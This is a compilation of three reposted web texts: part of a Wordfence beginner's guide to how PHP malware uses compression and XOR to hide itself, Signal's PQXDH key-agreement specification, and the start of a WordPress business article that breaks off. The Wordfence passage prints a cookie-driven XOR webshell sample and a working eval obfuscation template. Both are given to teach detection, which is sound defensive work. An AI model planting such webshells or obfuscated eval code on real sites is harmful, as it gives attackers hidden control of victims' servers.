Gzip uses an algorithm called “DEFLATE” which tends to be very fast and is often used by web servers to compress outbound data over the network. This process is effectively transparent – if configured correctly, a web server will send out a compressed page and your browser will automatically and transparently decompress and load it. Zlib and Bzip2 are slower but attain higher compression ratios so they’re often used to store archive files.

How is Compression Used by Malware?

Compressed files have a unique advantage for malicious actors – it is difficult to spot particular data in them, especially at high compression ratios. However, they also can’t easily be executed directly in the context of PHP. Compression isn’t limited to just files – any data, including text strings can be compressed. This means that an attacker can use compression to hide their code in a file and uncompress and execute it at runtime using, for instance, the gzinflate and gzuncompress functions.

There is one hurdle, however, which is that compressed files contain binary data, that is, data that can’t be directly represented as a text string. One solution to this is to load the compressed data from a separate, appropriately formatted file. Since attackers can often only upload a single file to take control of a site, this can be impractical.

While it is possible to mix string and raw binary data in a single file, reading these separately often requires knowing exactly where in the file everything is, which may be difficult if the file was uploaded or written by exploiting a vulnerability.

Earlier in the article, we discussed ways to safely store binary data in a text string, such as base64 encoding and byte escape sequences. These become significantly more useful to attackers when combined with compression algorithms, and we’ll examine this use case shortly.

XOR Encoding

What is XOR Encoding?

XOR (eXclusive OR) is a simple way to mix two sets of data together at the binary level, meaning it operates on the 1s and 0s that make up data. Think of it as a lightweight disguise for data. It takes two bits (a 1 or a 0) and compares them. If the bits are the same, it outputs 0; if they’re different, it outputs 1.

Here’s an example:

0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0

In PHP, you would use the ^ symbol to do an XOR operation between two characters. What actually happens is that the computer looks at the binary form of these characters and does the XOR bit by bit.

For example, the letter ‘A’ in binary is 01000001, and ‘B’ is 01000010. When you XOR them:

01000001
01000010
——–
00000011

You get a jumbled mix of the two. What makes XOR particularly useful is that if you take this result and do the exact same XOR operation on it again with ‘B’, you’ll get back ‘A’.

How is XOR Encoding Used Legitimately?

In practical terms, XOR is used for basic encryption or data masking. It’s fast and doesn’t require a lot of computing power. For example, if you have a secret key that both the sender and receiver know, you could XOR your message with this key to obscure the text before sending it over the internet. The downside to this is that it is usually trivial to find the “key” using statistical analysis, so while XOR encoding is used as part of a much more complex process by many strong encryption schemes, it is not secure encryption on its own.

How is XOR Encoding Used by Malware?

XOR encoding is particularly useful for attackers who want to restrict access to malware, such as webshells, used to control a website. For instance, by making the XOR “key” a value that isn’t present in the malware itself but is passed in by an input parameter, it acts as a password protection mechanism that makes the malware unable to run unless an attacker who knows the key sends a specially crafted request. Likewise, needing the key to deobfuscate the malware makes it much more difficult for security analysts and scanners to identify malicious behavior.

The following malicious file actually includes the “key” in the malware itself, but requires commands to be encoded with that key before they can be processed. It accepts various $_COOKIE values and XORs them against the value of $odqwv, then executes the decoded commands.

12345678910111213<?php $odqwv= "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc"^ "trhvvbuzeadricgobq"; $mvxr= $_COOKIE; foreach($mvxras$q=>$h){$mvxr[$q] = $odqwv($h) ^ str_pad($q, strlen($h), $q);}$zgas= $mvxr["dj"]();$lo= $mvxr["ayy"] ($zgas);$lo= $lo['uri'];$mvxr["l"] ($zgas, $mvxr["mdcgv"]);require($lo);$mvxr["kxldb"] ($zgas);$mvxr["rfmcipa"]($lo);?>

This means that any attacker that knows the value of $odqwv can thus send commands to the file that have already been XORd against that value, which will then be reversed and executed.

In this example, $odqwv is the XORd value of \x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc and trhvvbuzeadricgobq which turns out to be “base64_decode.” You can find this value by creating a simple one liner

1<?php $odqwv= "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc"^ "trhvvbuzeadricgobq"; echo$odqwv;?>

which prints the value. In this case $odqwv is the literal string “base64_decode” but this is simply used as a key and does not refer to the built-in function itself.

The value in $_COOKIE[“dj”] is then XORd against the $odqwv key, which is ‘base64_decode’, and the result is called as a function, with similar steps occurring throughout the rest of the code.

Putting it All Together

Most obfuscated malware uses a combination of these techniques to hide its functionality, and combined techniques are one of the clearest indications of malicious activity. For example, take the following code:

1234567891011<?php$base64_data= "09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA=";$xor_key= $_GET[‘k’];$decoded_base64= base64_decode($base64_data);$inflated_data= gzinflate($decoded_base64);$xor_decoded= $inflated_data^ str_repeat($xor_key, strlen($inflated_data));eval($xor_decoded);?>

If supplied with the correct $xor_key, it will output “Hello, World!”.

Let’s take a look at how we did this:
First, we took the code ‘echo “Hello, World!”;’ and XOR-encoded it with a key value of ‘K’, resulting in the output .(#$ki.''$gk$9'/jip.

We then ran it through the gzdeflate function, which results in a binary output that can’t be rendered here, but after base64-encoding that output it turns into 09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA=.

If you placed the code in a hello.php file on your site and accessed it, you’d get a blank screen unless you sent a request to /hello.php?k=K, which would output “Hello, World!”.

While this example only outputs “Hello, World!” when it is passed the right key, it is trivial to disguise any PHP code in this manner, including destructive code that adds malicious administrators, creates additional malicious files, or alters system settings.

Conclusion

In today’s article, we discussed the most commonly used encoding techniques in PHP, their legitimate applications, and how malicious code uses them to obfuscate its purpose and intent. While obfuscation is an arms race, the Wordfence scanner and Wordfence CLI both use our incredibly effective malware detection signatures and are able to detect the vast majority of obfuscated malware targeting WordPress. A large part of why this is possible is due to our expertise and deep understanding of these encoding techniques and which combinations of encoding tend to indicate malicious behavior. Our experienced security analysts are continuously writing new signatures to improve our detection capabilities.

In a future article, we’ll cover more advanced obfuscation techniques that rely on other properties and quirks of PHP, but it’s necessary to understand basic encoding methods first because of how frequently they’re used, even when they’re not the primary method of obfuscation.

We encourage readers who want to learn more about this to experiment with the various code snippets we have presented. More advanced readers may wish to review public malware repositories in order to better learn to spot these indicators, but be sure to be careful with any actual malware samples you find and only execute them in a virtual environment, as even PHP malware can be used for local privilege escalation on vulnerable machines.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

Did you enjoy this post? Share it!

Source :
https://www.wordfence.com/blog/2023/10/know-your-malware-a-beginners-guide-to-encoding-techniques-used-to-obfuscate-malware/

The PQXDH Key Agreement Protocol

Revision 1, 2023-05-24 [PDF]

Ehren Kret, Rolfe Schmidt

Table of Contents

1. Introduction

This document describes the “PQXDH” (or “Post-Quantum Extended Diffie-Hellman”) key agreement protocol. PQXDH establishes a shared secret key between two parties who mutually authenticate each other based on public keys. PQXDH provides post-quantum forward secrecy and a form of cryptographic deniability but still relies on the hardness of the discrete log problem for mutual authentication in this revision of the protocol.

PQXDH is designed for asynchronous settings where one user (“Bob”) is offline but has published some information to a server. Another user (“Alice”) wants to use that information to send encrypted data to Bob, and also establish a shared secret key for future communication.

2. Preliminaries

2.1. PQXDH parameters

An application using PQXDH must decide on several parameters:

NameDefinition
curveA Montgomery curve for which XEdDSA [1] is specified, at present this is one of curve25519 or curve448
hashA 256 or 512-bit hash function (e.g. SHA-256 or SHA-512)
infoAn ASCII string identifying the application with a minimum length of 8 bytes
pqkemA post-quantum key encapsulation mechanism (e.g. Crystals-Kyber-1024 [2])
EncodeECA function that encodes a curve public key into a byte sequence
DecodeECA function that decodes a byte sequence into a curve public key and is the inverse of EncodeEC
EncodeKEMA function that encodes a pqkem public key into a byte sequence
DecodeKEMA function that decodes a byte sequence into a pqkem public key and is the inverse of EncodeKEM

For example, an application could choose curve as curve25519, hash as SHA-512, info as “MyProtocol”, and pqkem as CRYSTALS-KYBER-1024.

The recommended implementation of EncodeEC consists of a single-byte constant representation of curve followed by little-endian encoding of the u-coordinate as specified in [3]. The single-byte representation of curve is defined by the implementer. Similarly the recommended implementation of DecodeEC reads the first byte to determine the parameter curve. If the first byte does not represent a recognized curve, the function fails. Otherwise it applies the little-endian decoding of the u-coordinate for curve as specified in [3].

The recommended implementation of EncodeKEM consists of a single-byte constant representation of pqkem followed by the encoding of PQKPK specified by pqkem. The single-byte representation of pqkem is defined by the implementer. Similarly the recommended implementation of DecodeKEM reads the first byte to determine the parameter pqkem. If the first byte does not represent a recognized key encapsulation mechanism, the function fails. Otherwise it applies the decoding specified by the selected key encapsulation mechanism.

2.2. Cryptographic notation

Throughout this document, all public keys have a corresponding private key, but to simplify descriptions we will identify key pairs by the public key and assume that the corresponding private key can be accessed by the key owner.

This document will use the following notation:

  • The concatenation of byte sequences X and Y is X || Y.
  • DH(PK1, PK2) represents a byte sequence which is the shared secret output from an Elliptic Curve Diffie-Hellman function involving the key pairs represented by public keys PK1 and PK2. The Elliptic Curve Diffie-Hellman function will be either the X25519 or X448 function from [3], depending on the curve parameter.
  • Sig(PK, M, Z) represents the byte sequence that is a curve XEdDSA signature on the byte sequence M which was created by signing M with PK’s corresponding private key and using 64 bytes of randomness Z. This signature verifies with public key PK. The signing and verification functions for XEdDSA are specified in [1].
  • KDF(KM) represents 32 bytes of output from the HKDF algorithm [4] using hash with inputs:
    • HKDF input key material = F || KM, where KM is an input byte sequence containing secret key material, and F is a byte sequence containing 32 0xFF bytes if curve is curve25519, and 57 0xFF bytes if curve is curve448. As in in XEdDSA [1]F ensures that the first bits of the HKDF input key material are never a valid encoding of a scalar or elliptic curve point.
    • HKDF salt = A zero-filled byte sequence with length equal to the hash output length, in bytes.
    • HKDF info = The concatenation of string representations of the 4 PQXDH parameters infocurvehash, and pqkem into a single string separated with ‘_’ such as “MyProtocol_CURVE25519_SHA-512_CRYSTALS-KYBER-1024”. The string representations of the PQXDH parameters are defined by the implementer.
  • (CT, SS) = PQKEM-ENC(PK) represents a tuple of the byte sequence that is the KEM ciphertext, CT, output by the algorithm pqkem together with the shared secret byte sequence SS encapsulated by the ciphertext using the public key PK.
  • PQKEM-DEC(PK, CT) represents the shared secret byte sequence SS decapsulated from a pqkem ciphertext using the private key counterpart of the public key PK used to encapsulate the ciphertext CT.

2.3. Roles

The PQXDH protocol involves three parties: AliceBob, and a server.

  • Alice wants to send Bob some initial data using encryption, and also establish a shared secret key which may be used for bidirectional communication.
  • Bob wants to allow parties like Alice to establish a shared key with him and send encrypted data. However, Bob might be offline when Alice attempts to do this. To enable this, Bob has a relationship with some server.
  • The server can store messages from Alice to Bob which Bob can later retrieve. The server also lets Bob publish some data which the server will provide to parties like Alice. The amount of trust placed in the server is discussed in Section 4.9.

In some systems the server role might be divided between multiple entities, but for simplicity we assume a single server that provides the above functions for Alice and Bob.

2.4. Elliptic Curve Keys

PQXDH uses the following elliptic curve public keys:

NameDefinition
IKAAlice’s identity key
IKBBob’s identity key
EKAAlice’s ephemeral key
SPKBBob’s signed prekey
(OPKB1OPKB2, …)Bob’s set of one-time prekeys

The elliptic curve public keys used within a PQXDH protocol run must either all be in curve25519 form, or they must all be in curve448 form, depending on the curve parameter [3].

Each party has a long-term identity elliptic curve public key (IKA for Alice, IKB for Bob).

Bob also has a signed prekey SPKB, which he changes periodically and signs each time with IKB, and a set of one-time prekeys (OPKB1OPKB2, …), which are each used in a single PQXDH protocol run. (“Prekeys” are so named because they are essentially protocol messages which Bob publishes to the server prior to Alice beginning the protocol run.) These keys will be uploaded to the server as described in Section 3.2.

During each protocol run, Alice generates a new ephemeral key pair with public key EKA.

2.5. Post-Quantum Key Encapsulation Keys

PQXDH uses the following post-quantum key encapsulation public keys:

NameDefinition
PQSPKBBob’s signed last-resort pqkem prekey
(PQOPKB1PQOPKB2, …)Bob’s set of signed one-time pqkem prekeys

The pqkem public keys used within a PQXDH protocol run must all use the same pqkem parameter.

Bob has a signed last-resort post-quantum prekey PQSPKB, which he changes periodically and signs each time with IKB, and a set of signed one-time prekeys (PQOPKB1PQOPKB2, …) which are also signed with IKB and each used in a single PQXDH protocol run. These keys will be uploaded to the server as described in Section 3.2. The name “last-resort” refers to the fact that the last-resort prekey is only used when one-time pqkem prekeys are not available. This can happen when the number of prekey bundles downloaded for Bob exceeds the number of one-time pqkem prekeys Bob has uploaded (see Section 3 for details about the role of the server).

3. The PQXDH protocol

3.1. Overview

PQXDH has three phases:

  1. Bob publishes his elliptic curve identity key, elliptic curve prekeys, and pqkem prekeys to a server.
  2. Alice fetches a “prekey bundle” from the server, and uses it to send an initial message to Bob.
  3. Bob receives and processes Alice’s initial message.

The following sections explain these phases.

3.2. Publishing keys

Bob generates a sequence of 64-byte random values ZSPK, ZPQSPK, Z1, Z2, … and publishes a set of keys to the server containing:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • Bob’s signed last-resort pqkem prekey PQSPKB
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQSPKB), ZPQSPK)
  • A set of Bob’s one-time curve prekeys (OPKB1, OPKB2, OPKB3, …)
  • A set of Bob’s signed one-time pqkem prekeys (PQOPKB1, PQOPKB2, PQOPKB3, …)
  • The set of Bob’s signatures on the signed one-time pqkem prekeys (Sig(IKB, EncodeKEM(PQOPKB1), Z1), Sig(IKB, EncodeKEM(PQOPKB2), Z2), Sig(IKB, EncodeKEM(PQOPKB3), Z3), …)

Bob only needs to upload his identity key to the server once. However, Bob may upload new one-time prekeys at other times (e.g. when the server informs Bob that the server’s store of one-time prekeys is getting low).

For both the signed curve prekey and the signed last-resort pqkem prekey, Bob will upload a new prekey along with its signature using IKB at some interval (e.g. once a week or once a month). The new signed prekey and its signatures will replace the previous values.

After uploading a new pair of signed curve and signed last-resort pqkem prekeys, Bob may keep the private key corresponding to the previous pair around for some period of time to handle messages using it that may have been delayed in transit. Eventually, Bob should delete this private key for forward secrecy (one-time prekey private keys will be deleted as Bob receives messages using them; see Section 3.4).

3.3. Sending the initial message

To perform a PQXDH key agreement with Bob, Alice contacts the server and fetches a “prekey bundle” containing the following values:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • One of either Bob’s signed one-time pqkem prekey PQOPKBn or Bob’s last-resort signed pqkem prekey PQSPKB if no signed one-time pqkem prekey remains. Call this key PQPKB.
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQPKB), ZPQPK)
  • (Optionally) Bob’s one-time curve prekey OPKBn

The server should provide one of Bob’s curve one-time prekeys if one exists and then delete it. If all of Bob’s curve one-time prekeys on the server have been deleted, the bundle will not contain a one-time curve prekey element.

The server should prefer to provide one of Bob’s pqkem one-time signed prekeys PQOPKBn if one exists and then delete it. If all of Bob’s pqkem one-time signed prekeys on the server have been deleted, the bundle will instead contain Bob’s pqkem last-resort signed prekey PQSPKB.

Alice verifies the signatures on the prekeys. If any signature check fails, Alice aborts the protocol. Otherwise, if all signature checks pass, Alice then generates an ephemeral curve key pair with public key EKA. Alice additionally generates a pqkem encapsulated shared secret:

    (CT, SS) = PQKEM-ENC(PQPKB)
               shared secret SS
               ciphertext CT

If the bundle does not contain a curve one-time prekey, she calculates:

    DH1 = DH(IKA, SPKB)
    DH2 = DH(EKA, IKB)
    DH3 = DH(EKA, SPKB)
    SK = KDF(DH1 || DH2 || DH3 || SS)

If the bundle does contain a curve one-time prekey, the calculation is modified to include an additional DH:

    DH4 = DH(EKA, OPKB)
    SK = KDF(DH1 || DH2 || DH3 || DH4 || SS)

After calculating SK, Alice deletes her ephemeral private key, the DH outputs, the shared secret SS, and the ciphertext CT.

Alice then calculates an “associated data” byte sequence AD that contains identity information for both parties:

    AD = EncodeEC(IKA) || EncodeEC(IKB)

Alice may optionally append additional information to AD, such as Alice and Bob’s usernames, certificates, or other identifying information.

Alice then sends Bob an initial message containing:

  • Alice’s identity key IKA
  • Alice’s ephemeral key EKA
  • The pqkem ciphertext CT encapsulating SS for PQPKB
  • Identifiers stating which of Bob’s prekeys Alice used
  • An initial ciphertext encrypted with some AEAD encryption scheme [5] using AD as associated data and using an encryption key which is either SK or the output from some cryptographic PRF keyed by SK.

The initial ciphertext is typically the first message in some post-PQXDH communication protocol. In other words, this ciphertext typically has two roles, serving as the first message within some post-PQXDH protocol, and as part of Alice’s PQXDH initial message.

The initial message must be encoded in an unambiguous format to avoid confusion of the message items by the recipient.

After sending this, Alice may continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Bob, subject to the security considerations discussed in Section 4.

3.4. Receiving the initial message

Upon receiving Alice’s initial message, Bob retrieves Alice’s identity key and ephemeral key from the message. Bob also loads his identity private key and the private key(s) corresponding to the signed prekeys and one-time prekeys Alice used.

Using these keys, Bob calculates PQKEM-DEC(PQPKB, CT) as the shared secret SS and repeats the DH and KDF calculations from the previous section to derive SK, and then deletes the DH values and SS values.

Bob then constructs the AD byte sequence using IKA and IKB as described in the previous section. Finally, Bob attempts to decrypt the initial ciphertext using SK and AD. If the initial ciphertext fails to decrypt, then Bob aborts the protocol and deletes SK.

If the initial ciphertext decrypts successfully, the protocol is complete for Bob. For forward secrecy, Bob deletes the ciphertext and any one-time prekey private key that was used. Bob may then continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Alice subject to the security considerations discussed in Section 4.

4. Security considerations

The security of the composition of X3DH [6] with the Double Ratchet [7] was formally studied in [8] and proven secure under the Gap Diffie-Hellman assumption (GDH)[9]. PQXDH composed with the Double Ratchet retains this security against an adversary without access to a quantum computer, but strengthens the security of the initial handshake to require the solution of both GDH and Module-LWE [10]. The remainder of this section discusses an incomplete list of further security considerations.

4.1. Authentication

Before or after a PQXDH key agreement, the parties may compare their identity public keys IKA and IKB through some authenticated channel. For example, they may compare public key fingerprints manually, or by scanning a QR code. Methods for doing this are outside the scope of this document.

Authentication in PQXDH is not quantum-secure. In the presence of an active quantum adversary, the parties receive no cryptographic guarantees as to who they are communicating with. Post-quantum secure deniable mutual authentication is an open research problem which we hope to address with a future revision of this protocol.

If authentication is not performed, the parties receive no cryptographic guarantee as to who they are communicating with.

4.2. Protocol replay

If Alice’s initial message doesn’t use a one-time prekey, it may be replayed to Bob and he will accept it. This could cause Bob to think Alice had sent him the same message (or messages) repeatedly.

To mitigate this, a post-PQXDH protocol may wish to quickly negotiate a new encryption key for Alice based on fresh random input from Bob. This is the typical behavior of Diffie-Hellman-based ratcheting protocols [7].

Bob could attempt other mitigations, such as maintaining a blacklist of observed messages, or replacing old signed prekeys more rapidly. Analyzing these mitigations is beyond the scope of this document.

4.3. Replay and key reuse

Another consequence of the replays discussed in the previous section is that a successfully replayed initial message would cause Bob to derive the same SK in different protocol runs.

For this reason, any post-PQXDH protocol that uses SK to derive encryption keys MUST take measures to prevent catastrophic key reuse. For example, Bob could use a DH-based ratcheting protocol to combine SK with a freshly generated DH output to get a randomized encryption key [7].

4.4. Deniability

Informally, cryptographic deniability means that a protocol neither gives its participants a publishable cryptographic proof of the contents of their communication nor proof of the fact that they communicated. PQXDH, like X3DH, aims to provide both Alice and Bob deniablilty that they communicated with each other in a context where a “judge” who may have access to one or more party’s secret keys is presented with a transcript allegedly created by communication between Alice and Bob.

We focus on offline deniability because if either party is collaborating with a third party during protocol execution, they will be able to provide proof of their communication to such a third party. This limitation on “online” deniability appears to be intrinsic to the asynchronous setting [11].

PQXDH has some forms of cryptographic deniability. Motivated by the goals of X3DH, Brendel et al. [12] introduce a notion of 1-out-of-2 deniability for semi-honest parties and a “big brother” judge with access to all parties’ secret keys. Since either Alice or Bob can create a fake transcript using only their own secret keys, PQXDH has this deniability property. Vatandas, et al. [13] prove that X3DH is deniable in a different sense subject to certain “Knowledge of Diffie-Hellman Assumptions”. PQXDH is deniable in this sense for Alice, subject to the same assumptions, and we conjecture that it is deniable for Bob subject to an additional Plaintext Awareness (PA) assumption for pqkem. We note that Kyber uses a variant of the Fujisaki-Okamoto transform with implicit rejection [14] and is therefore not PA as is. However, in PQXDH, an AEAD ciphertext encrypted with the session key is always sent along with the Kyber ciphertext. This should offer the same guarantees as PA. We encourage the community to investigate the precise deniability properties of PQXDH.

These assertions all pertain to deniability in the classical setting. As discussed in [15] we expect that for future revisions of this protocol (that provide post-quantum mutual authentication) assertions about deniability against semi-honest quantum advsersaries will hold. Deniability in the face of malicious quantum adversaries requires further research.

4.5. Signatures

It might be tempting to omit the prekey signature after observing that mutual authentication and forward secrecy are achieved by the DH calculations. However, this would allow a “weak forward secrecy” attack: A malicious server could provide Alice a prekey bundle with forged prekeys, and later compromise Bob’s IKB to calculate SK.

Alternatively, it might be tempting to replace the DH-based mutual authentication (i.e. DH1 and DH2) with signatures from the identity keys. However, this reduces deniability, increases the size of initial messages, and increases the damage done if ephemeral or prekey private keys are compromised, or if the signature scheme is broken.

4.6. Key compromise

Compromise of a party’s private keys has a disastrous effect on security, though the use of ephemeral keys and prekeys provides some mitigation.

Compromise of a party’s identity private key allows impersonation of that party to others. Compromise of a party’s prekey private keys may affect the security of older or newer SK values, depending on many considerations.

A full analysis of all possible compromise scenarios is outside the scope of this document, however a partial analysis of some plausible scenarios is below:

  • If either an elliptic curve one-time prekey (OPKB) or a post-quantum key encapsulation one-time prekey (PQOPKB) are used for a protocol run and deleted as specified, then a compromise of Bob’s identity key and prekey private keys at some future time will not compromise the older SK.
  • If one-time prekeys were not used for a protocol run, then a compromise of the private keys for IKBSPKB, and PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].
  • Compromise of prekey private keys may enable attacks that extend into the future, such as passive calculation of SK values, and impersonation of arbitrary other parties to the compromised party (“key-compromise impersonation”). These attacks are possible until the compromised party replaces his compromised prekeys on the server (in the case of passive attack); or deletes his compromised signed prekey’s private key (in the case of key-compromise impersonation).

4.7. Passive quantum adversaries

PQXDH is designed to prevent “harvest now, decrypt later” attacks by adversaries with access to a quantum computer capable of computing discrete logarithms in curve.

  • If an attacker has recorded the public information and the message from Alice to Bob, even access to a quantum computer will not compromise SK.
  • If a post-quantum key encapsulation one-time prekey (PQOPKB) is used for a protocol run and deleted as specified then compromise after deletion and access to a quantum computer at some future time will not compromise the older SK.
  • If post-quantum one-time prekeys were not used for a protocol run, then access to a quantum computer and a compromise of the private key for PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].

4.8. Active quantum adversaries

PQXDH is not designed to provide protection against active quantum attackers. An active attacker with access to a quantum computer capable of computing discrete logarithms in curve can compute DH(PK1, PK2) and Sig(PK, M, Z) for all elliptic curve keys PK1PK2, and PK. This allows an attacker to impersonate Alice by using the quantum computer to compute the secret key corresponding to PKA then continuing with the protocol. A malicious server with access to such a quantum computer could impersonate Bob by generating new key pairs PQSPK’B and PQOPK’B, computing the secret key corresponding to PKB, then using PKB to sign the newly generated post-quantum KEM keys and delivering these attacker-generated keys in place of Bob’s post-quantum KEM key when Alice requests a prekey bundle.

It is tempting to consider adding a post-quantum identity key that Bob could use to sign the post-quantum prekeys. This would prevent the malicious server attack described above and provide Alice a cryptographic guarantee that she is communicating with Bob, but it does not provide mutual authentication. Bob does not have any cryptographic guarantee about who he is communicating with. The post-quantum KEM and signature schemes being standardized by NIST [16] do not provide a mechanism for post-quantum deniable mutual authentication, although this can be achieved through the use of a post-quantum ring signature or designated verifier signature [12][15]. We urge the community to work toward standardization of these or other mechanisms that will allow deniable mutual authentication.

4.9. Server trust

A malicious server could cause communication between Alice and Bob to fail (e.g. by refusing to deliver messages).

If Alice and Bob authenticate each other as in Section 4.1, then the only additional attack available to the server is to refuse to hand out one-time prekeys, causing forward secrecy for SK to depend on the signed prekey’s lifetime (as analyzed in Section 4.6).

This reduction in initial forward secrecy could also happen if one party maliciously drains another party’s one-time prekeys, so the server should attempt to prevent this (e.g. with rate limits on fetching prekey bundles).

4.10. Identity binding

Authentication as in Section 4.1 does not necessarily prevent an “identity misbinding” or “unknown key share” attack.

This results when an attacker (“Charlie”) falsely presents Bob’s identity key fingerprint to Alice as his (Charlie’s) own, and then either forwards Alice’s initial message to Bob, or falsely presents Bob’s contact information as his own. The effect of this is that Alice thinks she is sending an initial message to Charlie when she is actually sending it to Bob.

To make this more difficult the parties can include more identifying information into AD, or hash more identifying information into the fingerprint, such as usernames, phone numbers, real names, or other identifying information. Charlie would be forced to lie about these additional values, which might be difficult.

However, there is no way to reliably prevent Charlie from lying about additional values, and including more identity information into the protocol often brings trade-offs in terms of privacy, flexibility, and user interface. A detailed analysis of these trade-offs is beyond the scope of this document.

4.11. Risks of weak randomness sources

In addition to concerns about the generation of the keys themselves, the security of the PQKEM shared secret relies on the random source available to Alice’s machine at the time of running the PQKEM-ENC operation. This leads to a situation similar to what we face with a Diffie-Hellman exchange. For both Diffie-Hellman and Kyber, if Alice has weak entropy then the resulting shared secret will have low entropy when conditioned on Bob’s public key. Thus both the classical and post-quantum security of SK depend on the strength of Alice’s random source.

Kyber hashes Bob’s public key with Alice’s random bits to generate the shared secret, making Bob’s key contributory, as it is with a Diffie-Hellman key exchange. This does not reduce the dependence on Alice’s entropy source, as described above, but it does limit Alice’s ability to control the post-quantum shared secret. Not all KEMs make Bob’s key contributory and this is a property to consider when selecting pqkem.

5. IPR

This document is hereby placed in the public domain.

6. Acknowledgements

The PQXDH protocol was developed by Ehren Kret and Rolfe Schmidt as an extension of the X3DH protocol [6] by Moxie Marlinspike and Trevor Perrin. Thanks to Trevor Perrin for discussions on the design of this protocol.

Thanks to Bas Westerbaan, Chris Peikert, Daniel Collins, Deirdre Connolly, John Schanck, Jon Millican, Jordan Rose, Karthik Bhargavan, Loïs Huguenin-Dumittan, Peter Schwabe, Rune Fiedler, Shuichi Katsumata, Sofía Celi, and Yo’av Rieck for helpful discussions and editorial feedback.

Thanks to the Kyber team [17] for their work on the Kyber key encapsulation mechanism.

7. References

[1]

T. Perrin, “The XEdDSA and VXEdDSA Signature Schemes,” 2016. https://signal.org/docs/specifications/xeddsa/

[2]

“Module-lattice-based key-encapsulation mechanism standard.” https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.203.ipd.pdf

[3]

A. Langley, M. Hamburg, and S. Turner, “Elliptic Curves for Security.” Internet Engineering Task Force; RFC 7748 (Informational); IETF, Jan-2016. http://www.ietf.org/rfc/rfc7748.txt

[4]

H. Krawczyk and P. Eronen, “HMAC-based Extract-and-Expand Key Derivation Function (HKDF).” Internet Engineering Task Force; RFC 5869 (Informational); IETF, May-2010. http://www.ietf.org/rfc/rfc5869.txt

[5]

P. Rogaway, “Authenticated-encryption with Associated-data,” in Proceedings of the 9th ACM Conference on Computer and Communications Security, 2002. http://web.cs.ucdavis.edu/~rogaway/papers/ad.pdf

[6]

M. Marlinspike and T. Perrin, “The X3DH Key Agreement Protocol,” 2016. https://signal.org/docs/specifications/x3dh/

[7]

T. Perrin and M. Marlinspike, “The Double Ratchet Algorithm,” 2016. https://signal.org/docs/specifications/doubleratchet/

[8]

K. Cohn-Gordon, C. Cremers, B. Dowling, L. Garratt, and D. Stebila, “A formal security analysis of the signal messaging protocol,” J. Cryptol., vol. 33, no. 4, 2020. https://doi.org/10.1007/s00145-020-09360-1

[9]

T. Okamoto and D. Pointcheval, “The gap-problems: A new class of problems for the security of cryptographic schemes,” in Proceedings of the 4th international workshop on practice and theory in public key cryptography: Public key cryptography, 2001.

[10]

A. Langlois and D. Stehlé, “Worst-case to average-case reductions for module lattices,” Des. Codes Cryptography, vol. 75, no. 3, Jun. 2015. https://doi.org/10.1007/s10623-014-9938-4

[11]

N. Unger and I. Goldberg, “Deniable Key Exchanges for Secure Messaging,” in Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015. https://cypherpunks.ca/~iang/pubs/dake-ccs15.pdf

[12]

J. Brendel, R. Fiedler, F. Günther, C. Janson, and D. Stebila, “Post-quantum asynchronous deniable key exchange and the signal handshake,” in Public-key cryptography – PKC 2022 – 25th IACR international conference on practice and theory of public-key cryptography, virtual event, march 8-11, 2022, proceedings, part II, 2022, vol. 13178. https://doi.org/10.1007/978-3-030-97131-1_1

[13]

N. Vatandas, R. Gennaro, B. Ithurburn, and H. Krawczyk, “On the cryptographic deniability of the signal protocol,” in Applied cryptography and network security – 18th international conference, ACNS 2020, rome, italy, october 19-22, 2020, proceedings, part II, 2020, vol. 12147. https://doi.org/10.1007/978-3-030-57878-7_10

[14]

D. Hofheinz, K. Hövelmanns, and E. Kiltz, “A modular analysis of the fujisaki-okamoto transformation,” in Theory of cryptography – 15th international conference, TCC 2017, baltimore, MD, USA, november 12-15, 2017, proceedings, part I, 2017, vol. 10677. https://doi.org/10.1007/978-3-319-70500-2_12

[15]

K. Hashimoto, S. Katsumata, K. Kwiatkowski, and T. Prest, “An efficient and generic construction for signal’s handshake (X3DH): Post-quantum, state leakage secure, and deniable,” J. Cryptol., vol. 35, no. 3, 2022. https://doi.org/10.1007/s00145-022-09427-1

[16]

NIST, “Post-quantum cryptography.” https://csrc.nist.gov/Projects/post-quantum-cryptography

[17]

“Kyber key encapsulation mechanism.” https://pq-crystals.org/kyber/

Source :
https://signal.org/docs/specifications/pqxdh/

How WordPress Can Help Scale Your Business

SEPTEMBER 12, 2023 BY PAUL G.

Having a robust online presence is not just an option but a necessity for businesses looking to scale. While there are numerous platforms that offer varying degrees of customization and functionality, WordPress stands out as a versatile Content Management System (CMS) that transcends its initial design as a platform for bloggers. WordPress has evolved into an incredibly powerful tool that can assist in the growth and management of your business, whether you’re a start-up or an established enterprise.

From its SEO capabilities to its eCommerce solutions, WordPress offers a range of features designed to make your business more efficient, reachable, and scalable. This article will delve into the multiple ways WordPress can be your business’s best friend, helping you navigate the complex maze of scaling effectively. So, if you’re contemplating how to take your business to the next level without getting tangled in the complexities of coding or spending a fortune, read on.

Why Choose WordPress for Business

When it comes to setting up and managing an online business, the platform you choose serves as the backbone of your operations. WordPress emerges as a leading choice for several compelling reasons:

